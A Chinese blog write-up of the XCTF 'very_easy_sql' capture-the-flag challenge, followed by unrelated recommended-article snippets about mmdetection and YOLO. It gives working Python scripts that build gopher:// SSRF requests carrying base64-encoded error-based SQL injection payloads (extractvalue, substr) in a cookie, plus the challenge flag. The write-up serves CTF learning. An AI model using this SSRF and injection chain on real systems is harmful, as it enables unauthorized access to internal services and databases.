攻防世界 very_easy_sql

已于 2024-06-12 15:01:42 修改
阅读量1.5k 收藏 21
点赞数 26
文章标签: sql 数据库 web安全
于 2024-06-12 14:56:30 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_63640108/article/details/139624784
版权

主要参考

攻防世界web新手 - very_easy_sql(非常详细的wp)_easy sql 攻防世界-优快云博客

【xctf之very_easy_sql】_xctf veryeasysql-优快云博客

题目进来提示要内部用户

进行了注入点测试 单引号 双引号 括号无反应 

响应包中有

Set-Cookie: this_is_your_cookie=deleted

前面提示了内部用户这里还this_is_your_cookie 猜测是注入点

ssrf详解
什么是ssrf
SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。
我理解的是相当于内网穿透,你获取到其中一个内网主机,可以用这个内网主机作为服务器向其他的内网机器发起攻击。SSRF 形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能且没有对目标地址做过滤与限制。

ssrf的利用
分享,通过URL地址分享网页内容,通过URL获取目标页标签等内容
转码服务,适应硬件设备的大小;
图片的加载与下载
图片,文章的收藏;
产生SSRF漏洞的函数
file_get_contents
fsockopen()
ssrf漏洞利用
1.可以对外网、服务器所在内网、本地进行端口扫描,获取一些服务的banner信息;
2.攻击运行在内网或本地的应用程序(比如溢出);
3.对内网web应用进行指纹识别,通过访问默认文件实现;
4.攻击内外网的web应用,主要是使用get参数就可以实现的攻击(比如struts2,sqli等);
5.利用file协议读取本地文件等。.
6.各个协议调用探针:http,file,dict,ftp,gopher等
本题目就是运用第六种,gopher协议。

 url curl 这是ssrf的关键字

 gopher协议的构造脚本

import urllib.parse

host = "127.0.0.1:80"
content = "uname=admin&passwd=admin"
content_length = len(content)

payload =\
"""POST /index.php HTTP/1.1
Host: {}
User-Agent: curl/7.43.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
Content-Length: {}

{}
""".format(host,content_length,content)

tmp = urllib.parse.quote(payload) #对payload中的特殊字符进行编码
new = tmp.replace('%0A','%0D%0A') #CRLF(换行)漏洞
result = 'gopher://127.0.0.1:80/'+'_'+new
result = urllib.parse.quote(result)# 对新增的部分继续编码
print(result)

返回数据包

YWRtaW4%3D  base64解码 admin7

首先测试是字符型还是整数型注入,构造payload为admin' #

测试后发现不回显信息 只有报错信息
 

admim')#

闭合点为     ')

报错注入模板 admin') and extractvalue(1, concat(0x7e, (select @@version),0x7e)) #

后面就正常sql注入流程 

优化一下脚本

import urllib.parse
import base64

host = "127.0.0.1:80"
payload = "admin') and extractvalue(1, concat(0x7e, (SELECT flag from flag),0x7e)) #"
base64_payload = str(base64.b64encode(payload.encode("utf-8")), "utf-8")
cookie = "this_is_your_cookie=" + base64_payload

test = \
"""GET /index.php HTTP/1.1
Host: {}
Connection: close
Content-Type: application/x-www-form-urlencoded
Cookie:{}
    
""".format(host, cookie)

tmp = urllib.parse.quote(test)
new = tmp.replace("%0A", "%0D%0A")
result = urllib.parse.quote(new)
print("gopher://" + host + "/_" + result)

到最后一步时flag显示不完全

报错的回显最大位数为32位,此时我们只获得了32位,需要用substr函数进行分割读取

import urllib.parse
import base64

host = "127.0.0.1:80"
payload = "admin') and extractvalue(1, concat(0x7e, substr((SELECT flag from flag),30,36),0x7e)) #"
base64_payload = str(base64.b64encode(payload.encode("utf-8")), "utf-8")
cookie = "this_is_your_cookie=" + base64_payload

test = \
"""GET /index.php HTTP/1.1
Host: {}
Connection: close
Content-Type: application/x-www-form-urlencoded
Cookie:{}
    
""".format(host, cookie)

tmp = urllib.parse.quote(test)
new = tmp.replace("%0A", "%0D%0A")
result = urllib.parse.quote(new)
print("gopher://" + host + "/_" + result)

flag为cyberpeace{22989b8c300c9bbcfef8db91dcc59a13}

璃怜月
关注
mmdetection自定义取出检测结果脚本及image_demo.py解析
认真努力,做一只会飞的毛毛虫。
03-01 9403
之所以要说image_demo.py,是因为其和video_demo.py、webcam_demo.py这三者是大差小不差,并为我们取出检测结果用于其他接口提供思路。image_demo.py在mmd\demo文件夹下。首先,我们给出image_demo.py的参数解析器和main()方法的注释,整个过程比较简单,随后进行逐方法分析。 import asyncio from argparse import ArgumentParser from mmdet.apis import (async_inf
上手OpenMMLab——MMDetection讲解与实战
Yuetian_w的博客
11-15 1135
将类别名设置为 COCO 全部类别,那么其实就可以转变了常规的目标检测算法(2) 图片+ 语言描述:There are a lot of cars here.[外链图片转存中…(img-9PBtIXnS-1700016796813)]上述输入是自然语言描述,因此等价于 Grounding Object Detection。
YOLO V8-Pose 【批量图片推理推理详解及部署实现
牧子川的博客
07-10 1675
在实际处理过程中,我们使用YOLO V8进行推理时,通常会针对一张图片进行推理。如果需要对多张图片进行推理,则可以通过一个循环来实现对图片逐张进行推理单张图片推理时,需要注意图片的尺寸必须是32的倍数,否则可能导致推理失败。批量图片推理时,也需要注意图片的尺寸必须是32的倍数。需要注意的是,在批量推理时,虽然一次推理了多张图片,但实际处理方式仍然是通过循环进行的。在下面的文章中,我们将介绍如何使用更高效的方式进行批量推理,以获得更快的推理速度和更好的性能。
MMDetection实战:MMDetection训练与测试
AI浩
05-08 1万+
摘要 MMDetection是商汤和港中文大学针对目标检测任务推出的一个开源项目,它基于Pytorch实现了大量的目标检测算法,把数据集构建、模型搭建、训练策略等过程都封装成了一个个模块,通过模块调用的方式,我们能够以很少的代码量实现一个新算法,大大提高了代码复用率。 GitHub链接:https://github.com/open-mmlab/mmdetection。 Gitee链接:https://gitee.com/open-mmlab/mmdetection。 主分支代码目前支持 PyTorch 1
open-mmlab的mmdetection使用总结
weixin_52120741的博客
10-31 332
使用总结如下:环境安装配置见官方教程,如果在jupyter-notebook里,只要在mim前加上!
【目标检测】MMDetection的安装与基础使用
兴趣使然的创作者
08-20 4171
MMDetection是商汤和港中文大学针对目标检测任务推出的一个开源工具包,统一标准化了很多前沿模型,为研究者复现代码提供了便利。本篇就来尝试安装一下MMDetection并简单跑一下官方的示例教程。
mmdetection 港中文媒体实验室开源的检测工具箱和评估基准
迷若烟雨的专栏
10-15 1万+
mmdetection是商汤开源的用于深度学习目标检测的库, 相比于早先开源的Detectron,maskrcnn-benchmark和SimpleDet具有以下特性: 模块化设计,将检测或者分割任务分解成几个模块,通过模块的组合即可完成相应的任务 开箱即用,实现了多种目标检测和分割算法,易于配置和使用 高效 所有对包围框和掩码的操作都可以在GPU上完成 领先性,获得过2018年COCO检测比赛的冠军,并且还在不断进化
MMPose-RTMO推理详解及部署实现(上)
周同学的博客
06-01 4109
MMPose-RTMO推理详解及部署实现(上)
CV:计算机视觉技最强学习路线之CV简介(传统视觉技术/相关概念)、早期/中期/近期应用领域(偏具体应用)、经典CNN架构(偏具体算法)概述、常用工具/库/框架/产品、环境安装、常用数据集、编程技巧
热门推荐
头部AI社区如有邀博主AI主题演讲请私信—心比天高,仗剑走天涯,保持热爱,奔赴向梦想!低调,专注,谦虚,自律,反思,成长,还算比较正能量的博主,公益免费传播…内心特别想在AI界做出一些可以推进历史进程影响力的技术(兴趣使然,有点小情怀,也有点使命感呀
10-18 8万+
​ CV:计算机视觉技最强学习路线之CV简介(传统视觉技术/相关概念)、早期/中期/近期应用领域(偏具体应用)、经典CNN架构(偏具体算法)概述、常用工具/库/框架/产品、环境安装、常用数据集、编程技巧 目录 最新文章 计算机视觉技最强学习路线 ☆☆一、计算机视觉的简介 ☆☆二、计算机视觉相关概念简介 ☆☆三、传统的计算机视觉技术之机器视觉/计算机图形学
RTMPose关键点检测实战——笔记3
AI浩
06-04 3685
今天,学习RTMPose关键点检测实战。教大家如何安装安装MMDetection和MMPose。实战项目以三角板关键点检测场景为例,结合OpenMMLab开源目标检测算法MMDetection、开源关键点检测算法库MMPose、开源模型部署算法库MMDeploy,全面讲解项目全流程:数据集:Labelme标注数据集、整理标注格式至MS COCO目标检测:分别训练Faster R CNN和RTMDet-Tiny目标检测模型、训练日志可视化、测试集评估、对图像、摄像头画面预测。
mmdetection测试推理多张图片并保存
weixin_51486807的博客
05-27 1645
# Copyright (c) OpenMMLab. All rights reserved. import asyncio from argparse import ArgumentParser from mmdet.apis import (async_inference_detector, inference_detector, init_detector, show_result_pyplot) import os import tqdm def
YOLO V8-Detection 【单张图片推理推理详解及部署实现
牧子川的博客
04-05 1万+
该代码对YOLO V8 中 Detection 中推理代码进行拆解,对里面单独的模块给单独提取出来,方便进行后续的修改,并且该代码是一个每次对一张图片进行推理
mmdetection推理无标注图像文件并输出检测结果(json文件)
qq_41961036的博客
11-09 2367
MMDetection 支持在不使用 ground-truth 标注的情况下对模型进行测试,这需要用到 CocoDataset。如果你的数据集格式不是 COCO 格式的,请将其转化成 COCO 格式。如果你的数据集格式是 VOC 或者 Cityscapes,你可以使用 tools/dataset_converters 内的脚本直接将其转化成 COCO 格式。生成图片的json后,json里的图片顺序可能和文件夹中的图片顺序,不一致,使用以下代码排序。
MMDetection系列 - 2】MMDetection使用自定义数据集训练、测试已有模型
Fate_serendipity的博客
04-16 2768
使用MMDetection利用自定义数据集进行模型训练、测试、推理
国芯思辰| 国产四通道24位生理电采集模拟前端AFE全面替换ADS1294R,心电贴性能再飞跃
weixin_38427020的博客
05-29 674
国芯思辰,国产芯片替代
vue组件和插件的区别
u014642921的博客
05-28 518
只要有install方法并且接受Vue构造函数作为参数,就能够被Vue.use使用。可以是第三方库,也可以是自己编写的组件。
el-table-column如何获取行数据的值
LoveYouQueena的博客
05-29 690
一旦你获取到了当前行的数据,就可以根据需要进行后续的操作或展示,比如删除、编辑当前行的数据等。的模板中定义一个按钮,并为该按钮添加一个点击事件处理器。在Vue 2.x中,你可以使用。属性(在Vue 3.x中)来获取当前行的数据。点击事件处理器会接收到一个参数(在Vue 2.x中是。如果你使用的是Vue 3.x,代码将略有不同,主要是将。中获取当前行的数据,并通过点击事件处理器进行后续操作。在Vue 3.x中,则使用。),该参数包含了当前行的数据。属性(在Vue 2.x中)或者。,在Vue 3.x中也是。
异步上传石墨文件进度条前端展示记录(采用Redis中List数据结构实现)
舒一笑的博客
05-29 321
摘要:Redis存储异步任务状态的数据结构选择与实践 本文探讨了异步任务状态存储在Redis中String与List数据结构的优劣对比及实践方案。String结构存在历史记录缺失、并发处理复杂、功能局限等问题;而List结构更适合需要完整历史记录、顺序处理、分布式任务的场景。文章提出了一个基于List结构的实现方案,包括状态记录工具类设计、进度更新方法和清理机制,强调直接存储对象而非JSON以避免并发问题。通过Java的this引用特性简化对象存储操作,实现了高效可靠的任务状态管理。
网易 - 灵犀办公文档
最新发布
葡萄城技术团队博客
05-30 530
网易 - 灵犀办公文档
mmdetection单张图片推理代码
03-26
<think>好的,我需要回答用户关于如何在mmdetection中使用单张图片进行推理的示例代码的问题。首先,用户提到了引用[1]和引用[2],所以我要确保引用正确。根据引用[1],mmdetection的image_demo.py脚本可以直接用于单张图片推理。我需要先确认这个脚本的使用方法,并给出具体的命令行示例。 接下来,用户可能需要一个更自定义的Python代码示例,比如不想通过命令行而想在自己的脚本中调用。这时候需要导入必要的模块,例如init_detector和inference_detector,然后加载模型和配置文件,最后进行推理并可视化结果。这部分需要确保代码正确,比如模型路径和配置文件的正确性,以及图像路径的替换提醒。 另外,用户可能关心是否需要安装额外的依赖,比如mmcv和PyTorch,可能需要提醒他们确保环境正确配置。同时,不同版本的mmdetection可能有不同的API变化,可能需要指出代码适用于较新版本,并建议查阅官方文档。 还需要注意代码中的参数说明,比如threshold参数用于过滤低置信度的检测框,这样用户可以根据需求调整。最后,生成相关问题时要围绕mmdetection的使用、配置、其他推理方式以及YOLO的比较,这些都能帮助用户进一步探索。</think>以下是在mmdetection框架中进行单张图片推理的两种常用方法: ### 方法一:使用官方demo脚本 通过mmdetection自带的`image_demo.py`脚本可以直接实现单张图片推理,执行命令格式为: ```bash python demo/image_demo.py \ ${IMAGE_PATH} \ ${CONFIG_FILE} \ ${CHECKPOINT_FILE} \ [--device ${GPU_ID}] \ [--score-thr ${SCORE_THRESH}] ``` 示例命令: ```bash python demo/image_demo.py demo/demo.jpg \ configs/faster_rcnn/faster_rcnn_r50_fpn_1x_coco.py \ checkpoints/faster_rcnn_r50_fpn_1x_coco_20200130-047c8118.pth \ --device cuda:0 \ --score-thr 0.3 ``` ### 方法二:自定义Python代码 若需要集成到自定义代码中,可使用以下模板: ```python from mmdet.apis import init_detector, inference_detector, show_result_pyplot # 配置文件和权重路径 config_file = 'configs/faster_rcnn/faster_rcnn_r50_fpn_1x_coco.py' checkpoint_file = 'checkpoints/faster_rcnn_r50_fpn_1x_coco.pth' # 初始化模型 model = init_detector(config_file, checkpoint_file, device='cuda:0') # 执行推理 img = 'test.jpg' result = inference_detector(model, img) # 可视化结果(置信度阈值0.3) vis_image = show_result_pyplot( model, img, result, score_thr=0.3, title='Detection Results' ) vis_image.show() ``` 注意事项: 1. 需提前安装mmcv-full和对应版本的PyTorch[^1] 2. 不同检测器的配置文件和权重需对应 3. `show_result_pyplot`返回PIL.Image对象,可直接保存或显示
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值